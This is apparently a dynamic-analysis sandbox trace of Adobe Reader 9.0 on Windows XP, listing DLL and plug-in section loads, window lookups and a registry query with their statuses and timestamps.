Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1955946104
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 390000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1955955632
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1955958518
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1955960759
Windows found	Window Name: no string Class Name: AdobeAcrobatSpeedLaunchCmdWnd HWND: 0	success	1956010752
Windows found	Window Name: no string Class Name: AdobeReaderSpeedLaunchCmdWnd HWND: 0	success	1956011031
Key value queried	Path: HKEY_LOCAL_MACHINE\SYSTEM\Setup Name: EnablePrefetcher	success or wait	1956012010
Section loaded	Path: \KnownDlls\AcroRd32.dll Access: write and read and execute Type: unknown Baseaddress: 390000 Size: 4096 Protection: readonly Mapped to pid: own pid	object name not found	1956012959
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.dll Access: query and write and read and execute Type: image Baseaddress: 940000 Size: 20512768 Protection: read write Mapped to pid: own pid	conflicting addresses	1956014482
Section loaded	Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid	success or wait	1956445064
Section loaded	Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 3C0000 Size: 36864 Protection: read write Mapped to pid: own pid	conflicting addresses	1956455582
Section loaded	Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 1CD0000 Size: 1257472 Protection: read write Mapped to pid: own pid	conflicting addresses	1956465278
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1956504651
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1956520119
Section loaded	Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid	success or wait	1956535657
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1956550999
Section loaded	Path: \KnownDlls\AGM.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	object name not found	1956554713
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AGM.dll Access: query and write and read and execute Type: image Baseaddress: 6000000 Size: 5902336 Protection: read write Mapped to pid: own pid	success or wait	1956558393
Section loaded	Path: \KnownDlls\CoolType.dll Access: write and read and execute Type: unknown Baseaddress: 6000000 Size: 5902336 Protection: read write Mapped to pid: own pid	object name not found	1956591279
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\CoolType.dll Access: query and write and read and execute Type: image Baseaddress: 8000000 Size: 2486272 Protection: read write Mapped to pid: own pid	success or wait	1956592917
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1956633207
Section loaded	Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	object name not found	1956639446
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1956641078
Section loaded	Path: \KnownDlls\BIB.dll Access: write and read and execute Type: unknown Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	object name not found	1956647378
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\BIB.dll Access: query and write and read and execute Type: image Baseaddress: 7000000 Size: 114688 Protection: read write Mapped to pid: own pid	success or wait	1956649299
Section loaded	Path: \KnownDlls\ACE.dll Access: write and read and execute Type: unknown Baseaddress: 7000000 Size: 114688 Protection: read write Mapped to pid: own pid	object name not found	1956675094
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\ACE.dll Access: query and write and read and execute Type: image Baseaddress: 5000000 Size: 798720 Protection: read write Mapped to pid: own pid	success or wait	1956676668
Windows found	Window Name: no string Class Name: AdobeAcrobatSpeedLaunchCmdWnd HWND: 0	success	1956916510
Windows found	Window Name: no string Class Name: AdobeReaderSpeedLaunchCmdWnd HWND: 0	success	1956916794
Section loaded	Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 20C0000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	1956918468
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 20C0000 Size: 299008 Protection: execute Mapped to pid: own pid	success or wait	1957076390
Section loaded	Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	success or wait	1957079485
Section loaded	Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid	object name exists	1957086916
Section loaded	Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 20D0000 Size: 262144 Protection: read write Mapped to pid: own pid	success or wait	1957096548
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2110000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	1957107992
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 2110000 Size: 180224 Protection: readonly Mapped to pid: own pid	success or wait	1957112435
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2110000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	1957118811
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and read Type: commit Baseaddress: 2110000 Size: 180224 Protection: readonly Mapped to pid: own pid	success or wait	1957122960
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 2110000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1957125951
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: write and read and execute Type: commit Baseaddress: 2120000 Size: 180224 Protection: execute Mapped to pid: own pid	success or wait	1957129772
Section loaded	Path: C:\WINDOWS\system32\msctfime.ime Access: query and write and read and execute Type: image Baseaddress: 755C0000 Size: 188416 Protection: read write Mapped to pid: own pid	success or wait	1957133709
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 2120000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1957167332
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1957284019
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 2130000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1957422019
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: write and read and execute Type: commit Baseaddress: 2120000 Size: 7573504 Protection: execute Mapped to pid: own pid	success or wait	1957464796
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: query and read Type: commit Baseaddress: 2120000 Size: 7573504 Protection: readonly Mapped to pid: own pid	success or wait	1957469008
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: write and read and execute Type: commit Baseaddress: 2120000 Size: 7573504 Protection: execute Mapped to pid: own pid	success or wait	1957509206
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: query and read Type: commit Baseaddress: 2120000 Size: 7573504 Protection: readonly Mapped to pid: own pid	success or wait	1957511680
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: write and read and execute Type: commit Baseaddress: 2120000 Size: 7573504 Protection: execute Mapped to pid: own pid	success or wait	1957540749
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\RdLang32.DEU Access: query and write and read and execute Type: image Baseaddress: 10000000 Size: 7573504 Protection: read write Mapped to pid: own pid	success or wait	1957545191
Section loaded	Path: \KnownDlls\SETUPAPI.dll Access: write and read and execute Type: unknown Baseaddress: 10000000 Size: 7573504 Protection: read write Mapped to pid: own pid	object name not found	1957766725
Section loaded	Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid	success or wait	1957769585
Section loaded	Path: C:\WINDOWS\system32\winlogon.exe Access: write and read and execute Type: commit Baseaddress: 2430000 Size: 507904 Protection: execute Mapped to pid: own pid	success or wait	1958354713
Section loaded	Path: \KnownDlls\xpsp2res.dll Access: write and read and execute Type: unknown Baseaddress: 2430000 Size: 507904 Protection: execute Mapped to pid: own pid	object name not found	1958362473
Section loaded	Path: C:\WINDOWS\system32\xpsp2res.dll Access: query and write and read and execute Type: image Baseaddress: 2430000 Size: 2904064 Protection: read write Mapped to pid: own pid	conflicting addresses	1958364260
Section loaded	Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 2430000 Size: 2904064 Protection: read write Mapped to pid: own pid	object name not found	1958538292
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1958540167
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.api Access: write and read and execute Type: commit Baseaddress: 2940000 Size: 4857856 Protection: execute Mapped to pid: own pid	success or wait	1958838027
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.api Access: query and write and read and execute Type: image Baseaddress: 22100000 Size: 4890624 Protection: read write Mapped to pid: own pid	success or wait	1958842434
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 1712128 Protection: execute Mapped to pid: own pid	success or wait	1958934089
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: query and read Type: commit Baseaddress: 2950000 Size: 1712128 Protection: readonly Mapped to pid: own pid	success or wait	1958938131
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 1712128 Protection: execute Mapped to pid: own pid	success or wait	1958950035
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: query and read Type: commit Baseaddress: 2950000 Size: 1712128 Protection: readonly Mapped to pid: own pid	success or wait	1958952335
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: write and read and execute Type: commit Baseaddress: 2950000 Size: 1712128 Protection: execute Mapped to pid: own pid	success or wait	1958958555
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Annots.DEU Access: query and write and read and execute Type: image Baseaddress: 2950000 Size: 1712128 Protection: read write Mapped to pid: own pid	conflicting addresses	1958960823
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1959053357
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1959057120
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 2B20000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1959208289
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1959518715
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1959520817
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 2B20000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1959583922
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 1392640 Protection: execute Mapped to pid: own pid	success or wait	1959729907
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl Access: query and read Type: commit Baseaddress: 2B10000 Size: 1392640 Protection: readonly Mapped to pid: own pid	success or wait	1959732657
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 1392640 Protection: execute Mapped to pid: own pid	success or wait	1959739834
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl Access: query and write and read and execute Type: image Baseaddress: 4000000 Size: 1413120 Protection: read write Mapped to pid: own pid	success or wait	1959742431
Section loaded	Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 4000000 Size: 1413120 Protection: read write Mapped to pid: own pid	object name not found	1959784099
Section loaded	Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid	success or wait	1959786006
Section loaded	Path: \KnownDlls\CLBCATQ.DLL Access: write and read and execute Type: unknown Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid	object name not found	1960005622
Section loaded	Path: C:\WINDOWS\system32\clbcatq.dll Access: query and write and read and execute Type: image Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	success or wait	1960007783
Section loaded	Path: \KnownDlls\COMRes.dll Access: write and read and execute Type: unknown Baseaddress: 76FD0000 Size: 520192 Protection: read write Mapped to pid: own pid	object name not found	1960010970
Section loaded	Path: C:\WINDOWS\system32\comres.dll Access: query and write and read and execute Type: image Baseaddress: 77050000 Size: 806912 Protection: read write Mapped to pid: own pid	success or wait	1960013532
Section loaded	Path: C:\WINDOWS\system32\oleacc.dll Access: write and read and execute Type: commit Baseaddress: 2B40000 Size: 163840 Protection: execute Mapped to pid: own pid	success or wait	1960088341
Section loaded	Path: C:\WINDOWS\system32\oleacc.dll Access: query and write and read and execute Type: image Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1960094577
Section loaded	Path: \KnownDlls\MSVCP60.dll Access: write and read and execute Type: unknown Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid	object name not found	1960102487
Section loaded	Path: C:\WINDOWS\system32\msvcp60.dll Access: query and write and read and execute Type: image Baseaddress: 76080000 Size: 413696 Protection: read write Mapped to pid: own pid	success or wait	1960104836
Section loaded	Path: C:\WINDOWS\system32\oleaccrc.dll Access: query and read Type: commit Baseaddress: 2B40000 Size: 20480 Protection: readonly Mapped to pid: own pid	success or wait	1960146783
Section loaded	Path: C:\WINDOWS\system32\oleacc.dll Access: query and read Type: commit Baseaddress: 2B50000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1960184144
Section loaded	Path: \KnownDlls\Msftedit.dll Access: write and read and execute Type: unknown Baseaddress: 2B50000 Size: 12288 Protection: readonly Mapped to pid: own pid	object name not found	1960312488
Section loaded	Path: C:\WINDOWS\system32\msftedit.dll Access: query and write and read and execute Type: image Baseaddress: 4B400000 Size: 548864 Protection: read write Mapped to pid: own pid	success or wait	1960314003
Section loaded	Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 3020000 Size: 159744 Protection: execute Mapped to pid: own pid	success or wait	1960328151
Section loaded	Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 3020000 Size: 159744 Protection: execute Mapped to pid: own pid	success or wait	1960330980
Section loaded	Path: C:\WINDOWS\system32\msimtf.dll Access: write and read and execute Type: commit Baseaddress: 3020000 Size: 159744 Protection: execute Mapped to pid: own pid	success or wait	1960339409
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api Access: write and read and execute Type: commit Baseaddress: 3020000 Size: 10436608 Protection: execute Mapped to pid: own pid	success or wait	1960817383
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api Access: query and write and read and execute Type: image Baseaddress: 20800000 Size: 11550720 Protection: read write Mapped to pid: own pid	success or wait	1960821059
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: write and read and execute Type: commit Baseaddress: 3030000 Size: 999424 Protection: execute Mapped to pid: own pid	success or wait	1960850314
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: query and read Type: commit Baseaddress: 3030000 Size: 999424 Protection: readonly Mapped to pid: own pid	success or wait	1960851842
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: write and read and execute Type: commit Baseaddress: 3030000 Size: 999424 Protection: execute Mapped to pid: own pid	success or wait	1960854816
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: query and read Type: commit Baseaddress: 3030000 Size: 999424 Protection: readonly Mapped to pid: own pid	success or wait	1960855592
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: write and read and execute Type: commit Baseaddress: 3030000 Size: 999424 Protection: execute Mapped to pid: own pid	success or wait	1960857204
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Acroform.DEU Access: query and write and read and execute Type: image Baseaddress: 3030000 Size: 999424 Protection: read write Mapped to pid: own pid	conflicting addresses	1960857997
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 3140000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1960892129
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1960893509
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 3150000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1960935864
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 3140000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1960951208
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1960951962
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 3150000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1960974878
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\EScript.api Access: write and read and execute Type: commit Baseaddress: 3140000 Size: 1523712 Protection: execute Mapped to pid: own pid	success or wait	1960984717
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\EScript.api Access: query and write and read and execute Type: image Baseaddress: 23800000 Size: 1544192 Protection: read write Mapped to pid: own pid	success or wait	1960986363
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: write and read and execute Type: commit Baseaddress: 3150000 Size: 106496 Protection: execute Mapped to pid: own pid	success or wait	1961006423
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: query and read Type: commit Baseaddress: 3150000 Size: 106496 Protection: readonly Mapped to pid: own pid	success or wait	1961008041
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: write and read and execute Type: commit Baseaddress: 3150000 Size: 106496 Protection: execute Mapped to pid: own pid	success or wait	1961009739
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: query and read Type: commit Baseaddress: 3150000 Size: 106496 Protection: readonly Mapped to pid: own pid	success or wait	1961010516
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: write and read and execute Type: commit Baseaddress: 3150000 Size: 106496 Protection: execute Mapped to pid: own pid	success or wait	1961011448
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Escript.deu Access: query and write and read and execute Type: image Baseaddress: 3150000 Size: 106496 Protection: read write Mapped to pid: own pid	conflicting addresses	1961012245
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: write and read and execute Type: commit Baseaddress: 31C0000 Size: 11083776 Protection: execute Mapped to pid: own pid	success or wait	1961071214
Section loaded	Path: C:\WINDOWS\system32\ieframe.dll Access: query and write and read and execute Type: image Baseaddress: 3E1C0000 Size: 11096064 Protection: read write Mapped to pid: own pid	success or wait	1961072013
Section loaded	Path: C:\WINDOWS\system32\en-us\ieframe.dll.mui Access: query and read Type: commit Baseaddress: 31D0000 Size: 1241088 Protection: write copy Mapped to pid: own pid	success or wait	1961099134
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api Access: write and read and execute Type: commit Baseaddress: 3CD0000 Size: 1282048 Protection: execute Mapped to pid: own pid	success or wait	1962914576
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api Access: query and write and read and execute Type: image Baseaddress: 23000000 Size: 1298432 Protection: read write Mapped to pid: own pid	success or wait	1962916506
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: write and read and execute Type: commit Baseaddress: 31E0000 Size: 274432 Protection: execute Mapped to pid: own pid	success or wait	1962937887
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: query and read Type: commit Baseaddress: 31E0000 Size: 274432 Protection: readonly Mapped to pid: own pid	success or wait	1962939491
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: write and read and execute Type: commit Baseaddress: 31E0000 Size: 274432 Protection: execute Mapped to pid: own pid	success or wait	1962941577
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: query and read Type: commit Baseaddress: 31E0000 Size: 274432 Protection: readonly Mapped to pid: own pid	success or wait	1962942340
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: write and read and execute Type: commit Baseaddress: 31E0000 Size: 274432 Protection: execute Mapped to pid: own pid	success or wait	1962943366
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DigSig.DEU Access: query and write and read and execute Type: image Baseaddress: 31E0000 Size: 274432 Protection: read write Mapped to pid: own pid	conflicting addresses	1962944145
Section loaded	Path: \KnownDlls\AXE8SharedExpat.dll Access: write and read and execute Type: unknown Baseaddress: 31E0000 Size: 274432 Protection: read write Mapped to pid: own pid	object name not found	1962966882
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AXE8SharedExpat.dll Access: query and write and read and execute Type: image Baseaddress: 3240000 Size: 188416 Protection: read write Mapped to pid: own pid	conflicting addresses	1962968288
Section loaded	Path: \KnownDlls\AXSLE.dll Access: write and read and execute Type: unknown Baseaddress: 3240000 Size: 188416 Protection: read write Mapped to pid: own pid	object name not found	1962983436
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\AXSLE.dll Access: query and write and read and execute Type: image Baseaddress: 3CD0000 Size: 622592 Protection: read write Mapped to pid: own pid	conflicting addresses	1962984448
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\cryptocme2.dll Access: write and read and execute Type: commit Baseaddress: 3D70000 Size: 401408 Protection: execute Mapped to pid: own pid	success or wait	1963269326
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\cryptocme2.dll Access: query and write and read and execute Type: image Baseaddress: 3D70000 Size: 610304 Protection: read write Mapped to pid: own pid	conflicting addresses	1963271856
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\ccme_base.dll Access: write and read and execute Type: commit Baseaddress: 3E10000 Size: 479232 Protection: execute Mapped to pid: own pid	success or wait	1966461823
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\ccme_base.dll Access: query and write and read and execute Type: image Baseaddress: 3E10000 Size: 483328 Protection: read write Mapped to pid: own pid	conflicting addresses	1966468008
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\accessibility.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 81920 Protection: execute Mapped to pid: own pid	success or wait	2054315050
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\accessibility.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 81920 Protection: readonly Mapped to pid: own pid	success or wait	2054318885
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 442368 Protection: execute Mapped to pid: own pid	success or wait	2054329266
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 442368 Protection: readonly Mapped to pid: own pid	success or wait	2054332804
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 442368 Protection: execute Mapped to pid: own pid	success or wait	2054338600
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 442368 Protection: readonly Mapped to pid: own pid	success or wait	2054342184
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.DEU Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 192512 Protection: execute Mapped to pid: own pid	success or wait	2054392561
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.DEU Access: query and read Type: commit Baseaddress: 3E90000 Size: 192512 Protection: readonly Mapped to pid: own pid	success or wait	2054396051
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 839680 Protection: execute Mapped to pid: own pid	success or wait	2054409214
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 839680 Protection: readonly Mapped to pid: own pid	success or wait	2054412016
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 839680 Protection: execute Mapped to pid: own pid	success or wait	2054418251
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 839680 Protection: readonly Mapped to pid: own pid	success or wait	2054420866
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.DEU Access: write and read and execute Type: commit Baseaddress: 32D0000 Size: 20480 Protection: execute Mapped to pid: own pid	success or wait	2054442853
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.DEU Access: query and read Type: commit Baseaddress: 32D0000 Size: 20480 Protection: readonly Mapped to pid: own pid	success or wait	2054446367
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 135168 Protection: execute Mapped to pid: own pid	success or wait	2054449727
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 135168 Protection: readonly Mapped to pid: own pid	success or wait	2054452385
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api Access: write and read and execute Type: commit Baseaddress: 3E90000 Size: 135168 Protection: execute Mapped to pid: own pid	success or wait	2054455746
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\DVA.api Access: query and read Type: commit Baseaddress: 3E90000 Size: 135168 Protection: readonly Mapped to pid: own pid	success or wait	2054458396
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\eBook.DEU Access: write and read and execute Type: commit Baseaddress: 32D0000 Size: 24576 Protection: execute Mapped to pid: own pid	success or wait	2054462690
